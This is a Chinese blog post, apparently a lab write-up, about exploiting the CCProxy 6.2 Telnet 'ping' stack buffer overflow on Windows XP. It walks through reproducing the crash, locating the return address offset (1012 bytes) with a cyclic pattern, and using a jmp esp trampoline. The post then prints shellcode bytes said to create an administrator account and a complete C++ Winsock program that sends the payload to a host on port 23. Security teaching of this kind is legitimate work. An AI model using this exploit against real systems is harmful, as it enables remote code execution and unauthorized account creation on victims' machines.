CCproxy缓冲区溢出攻击,对栈溢出的学习和利用

最新推荐文章于 2025-03-25 16:51:41 发布
最新推荐文章于 2025-03-25 16:51:41 发布
阅读量2.6k 收藏 38
点赞数 56
文章标签: 学习 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69815073/article/details/137475396
版权
本文围绕CCProxy 6.2在代理Telnet协议时的缓冲区溢出漏洞展开实验。介绍了实验背景,在特定环境下复现漏洞,使用CDB工具分析错误原因,找出溢出点和返回指令相对距离,构建shellcode并利用跳板技术进行攻击,最终成功在XP系统新建账户,实现漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.实验背景

  ccproxy是一款代理服务器软件,不仅支持常见的HTTP和SOCKETS代理,而且支持FTP和Telnet协议。CCProxy因其设置简单和使用方便等特点,成为国内最受欢迎的代理服务器软件。在telnet服务中存在本次实验的漏洞;也就是程序出现BUG的地方;

CCProxy在代理Telnet协议时,可以接受Ping命令
       Ping命令格式:ping hostname\r\n
当hostname的长度大于或者等于1010字节时,CCProxy 6.2会发生缓冲区溢出,导致程序崩溃;我们就程序出现崩溃的原因分析漏洞并进行攻击实验。

我们首先对程序崩溃进行复现。

二.实验环境

1.Windows XP sp1或sp2,或关闭DEP的SP3,或win2000

2.调试工具:CDB/NTSD/WinDbg:这三个工具都包含在Debugging Tools for Windows中

3.CCProxy 6.2

4.window socket 编程

三.漏洞复现

进入telnet

使用telnet 命令连接本机地址

telnet 127.0.0.1

通过ping一个2000字节的主机名,发现出现程序报错;

ping AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 

四.漏洞分析

我们使用CDB工具来查看具体错误的原因;

再次复现错误;同时开启CDB

通过任务管理器查看程序所对应的进程名

在cmd中调用命令

首先进入cdb所在的文件夹

cd C:\Program Files\Debugging Tools for Windows (x86)

然后用cdb将其挂起

cdb -pn CCProxy11.exe

输入g继续运行

在本机(XP)上再次执行ping命令加2000个字节A的主机名的操作;

捕获该错误事件

可以看到EIP=41414141;

也就是对应的A的ASCII码的值;说明eip寄存器发送了溢出;同时我们查询esp所指向的地址的值;发现全部都是41414141;

也被A覆盖;

那么我们分析程序在操作时的原理来理解入栈的过程;进而找出最合适的攻击手段;

我们首先PING +2000个A;这2000个主机名会存入程序的栈中的缓冲区中,2000个A会向栈顶的方向入栈,因为程序的缓冲区不够2000个字节;所以这些A会将栈顶ESP覆盖;EIP所指的位置应该是当程序执行出栈操作时,执行ret指令,结果返回的值所指向的位置全部是A,不是可执行的代码,所以程序就报错了,如果我们将RET所在的位置的代码进行改写,来执行我们的shellcode指令,就实现了程序的利用;

对RET的位置进行定位;我们利用非重复字符串定位的方法进行判断溢出点和返回指令之间的
相对距离;构建一个非重复字符串;长度为2k

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6

我们查询EIP和ESP对应的值:

EIP  42376a42

ESP  41316141

用c++编写代码来实现查找对应ASCII码的功能:

#include <iostream>
#include <string>

// Function to convert hexadecimal to ASCII
std::string hexToASCII(const std::string& hexString) {
    std::string result;

    // Iterate over each pair of characters in the hex string
    for (size_t i = 0; i < hexString.length(); i += 2) {
        // Extract two characters from the hex string
        std::string hexPair = hexString.substr(i, 2);

        // Convert the hex pair to decimal
        int decimalValue = std::stoi(hexPair, nullptr, 16);

        // Convert the decimal value to ASCII character
        char asciiChar = static_cast<char>(decimalValue);

        // Append the ASCII character to the result string
        result += asciiChar;
    }

    return result;
}

int main() {
    // Hexadecimal number to convert
    std::string hexNumber = "61413161";

    // Convert hexadecimal to ASCII
    std::string asciiString = hexToASCII(hexNumber);

    // Output the result
    std::cout << "Hexadecimal: " << hexNumber << std::endl;
    std::cout << "ASCII: " << asciiString << std::endl;

    return 0;
}

得到结果:

EIP:B7JB

ESP:aA1a

我们查询在非重复字符串分别对应缓冲区的偏移地址

EIP 1012

这说明,RET相对缓冲区的偏移大小是1012字节。
由于EBP占4字节,故存放局部变量的缓冲区大小为1008字节;

ESP 4

这说明ESP指向字符串的第4个字节因此,我们把shellcode放在字符串的第4
个字节处;

五.漏洞攻击

因此我们可以构建shellcode长度为2000;使用跳板技术;

在RET的位置输入 jmp esp 的指令;而在ESP所指的位置,也就是缓冲区第四个字节的位置添加攻击代码;

我们的攻击载荷设计如下:

[填充数据 4字节] + [shellcode 假设为x字节] + [填充 数据 1012-4-x字节] + [jmp esp地址 4字节] + [ 填充 数据]

首先设计shellcode 

在网上查找资料得到了创建管理员账户的一个代码:

char shellcode[] =

"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"

"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"

"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"

"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"

"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"

"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"

"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"

"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"

"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"

"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"

"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"

"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"

"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"

"\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"

"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"

"\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"

"\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"

"\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"

"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"

"\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"

"\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"

"\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"

"\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"

"\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"

"\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"

"\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"

"\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"

"\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"

"\x41\x44\x46\x44\x46\x44\x42\x30\x5a";
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

然后对全部字节进行设计

memset(Buff, 0x90, sizeof(Buff) - 1); //全部NOP填充  

memcpy(&Buff[0], "ping ", 5); //设置ping指令  

memcpy(&Buff[1998], "\r\n", 2); //设置结尾的\r\n  

memcpy(&Buff[1017], "\x12\x45\xfa\x7f", 4); //设置JMP ESP指令地址,定位1012,加上ping为1017  

memcpy(&Buff[9], shellcode, sizeof(shellcode) - 1); // ping5个,加之后4个NOP
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==


 我们利用CCproxy的telnet功能在局域网的另一台主机上对XP系统上的CCproxy进行攻击;

利用window的套接字功能;端口为 23 .,IP地址为192.168.247.134

代码如下:

#include <WinSock2.h>
#include <WS2tcpip.h>
#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
#include<iostream>
using namespace std;
#pragma comment(lib,"ws2_32.lib")

//创建管理员用户shellcode  

char shellcode[] =

"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"

"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"

"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"

"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"

"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"

"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"

"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"

"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"

"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"

"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"

"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"

"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"

"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"

"\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"

"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"

"\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"

"\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"

"\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"

"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"

"\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"

"\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"

"\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"

"\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"

"\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"

"\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"

"\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"

"\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"

"\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"

"\x41\x44\x46\x44\x46\x44\x42\x30\x5a";

int main()

{

	WSADATA WSAData;

	char Buff[2000], Recv[2000];

	int nRet, conRet;

	struct sockaddr_in ipAddress;

	SOCKET sockettest;

	if (WSAStartup(MAKEWORD(1, 1), &WSAData) != 0)

	{
		cout << "error!" << endl;

		WSACleanup();

		exit(1);

	}

	sockettest = socket(AF_INET, SOCK_STREAM, 0);

	ipAddress.sin_family = AF_INET;

	ipAddress.sin_addr.s_addr = inet_addr("192.168.247.134");

	ipAddress.sin_port = htons(23);

	conRet = connect(sockettest, (struct sockaddr*)&ipAddress, sizeof(ipAddress));

	memset(Buff, 0x90, sizeof(Buff) - 1); //全部NOP填充  

	memcpy(&Buff[0], "ping ", 5); //设置ping指令  

	memcpy(&Buff[1998], "\r\n", 2); //设置结尾的\r\n  

	memcpy(&Buff[1017], "\x12\x45\xfa\x7f", 4); //设置JMP ESP指令地址,定位1012,加上ping为1017  

	memcpy(&Buff[9], shellcode, sizeof(shellcode) - 1); // ping5个,加之后4个NOP  

	memset(Recv, 0x90, sizeof(Recv)); //初始化缓冲区  

	recv(sockettest, Recv, sizeof(Recv), 0);//目的主机存入缓冲区  

	nRet = send(sockettest, Buff, sizeof(Buff), 0);

	Sleep(1000);

	WSACleanup();

	printf("attack ok !\n");

	return 0;
}
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

在目标端的XP机上需要打开CCproxy;

六.实验结果

原本的XP系统上只有一个账户如图所示:

当执行完代码之后:

CCproxy提示错误;并且新建账户成功

  

漏洞利用成功;


 

S.W.R
关注
缓冲区溢出漏洞攻击演示实验
Mr.Buffoon
10-07 1万+
实验内容: 分析缓冲区溢出漏洞利用CCProxy 6.2的这个缓冲区溢出漏洞利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳转到自己想要让其执行的程序上去。   定位RET   寻找跳转指令地址   构造shellcode   定位shellcode存放位置   编写攻击程序 实验环境: 攻击主机:
缓冲区溢出教程
07-28
书中很细致的讲解了缓冲区溢出的知识,溢出原理、溢出点定位、常见的溢出方式等这些最基本的知识,希望大家喜欢。
通过CCproxy配置内网linux服务器连接外网
最新发布
CaRRot_Ran的博客
03-25 626
服务器无网络,使用CCproxy连接到外网。
CVE漏洞攻击——ccproxy溢出
qq_43840665的博客
04-17 4614
CCProxy6.2溢出漏洞 虚拟机:VirtualBox 6.1.30 操作系统:WindowsXP SP2 主机OS:Microsoft Windows10 CVE编号:CVE-2004-2685 安装共享文件夹 按照下面箭头指向程序,然后再虚拟机设置中自动挂载一个主机的共享文件夹 2. 关闭winxp的DEP 使系统显示C:\boot.ini 修改DEP选项 查询虚拟机IP并连接ccproxy 命令提示符中输入ipconfig可以获得ip地址,或者使用127.0.0.1
CCProxy的使用
Seven_cm
06-21 3700
1 打开ccproxy 点击account,增加需要代理的用户。 2 如下图 点击new添加新代理规则 3 如下图 红色框填入代理目标的IP地址,点击OK 4 查看运行ccproxy代理的IP地址: ipconfig 5 对被代理的目标机器,填写代理服务器信息(我的是移动端) 至此,ccproxy的使用介绍结束。如有错漏,请指出。
CCPROXY漏洞利用
panfengblog
11-02 2318
CCPROXY漏洞利用 CCProxy是一款非常流行的下载量最大的的国产代理服务器软件,其CCProxy 6.2版本存在一个栈溢出漏洞,可以通过此漏洞进行shellcode攻击,以下是学习过程的一个小记录吧 : ) 1.找到并定位溢出点 使用ping命令加一个超长的字符串加一个主机名,代理端会返回Host not found。 当输入的字符串足够长时(比如2000个a),软件就会溢出奔溃,通过二分法尝试,发现ping后最多接1009个字符,第1010字符开始溢出,并且前四字节无用,如下图,当输入
CCProxy使用指南
Qbit编程学习笔记
05-16 7619
目标是让一个电脑上安装CCProxy,然后其他电脑也是使用这台电脑上VPN 下载&安装 http://update.youngzsoft.com/ccproxy/update/ccproxysetup.exe 服务端配置 进入设置页面 记住上面的端口,一般HTTPHTTPS用的比较多,都是808端口 点击上面的高级按钮,选择网络,确保配置正确 git配置 git config --global https.proxy http://vpn.kamputer.online:808 git co
利用CCproxy漏洞实现缓冲区溢出攻击技术分析
在这次的知识点分析中,我们将围绕缓冲区溢出攻击及其在Windows XP平台上的具体应用展开,重点介绍攻击原理、CCproxy缓冲区溢出漏洞利用方式。 首先,缓冲区溢出攻击通常分为两类:堆溢出栈溢出。堆溢出是指在...
缓冲区溢出攻击
11-21
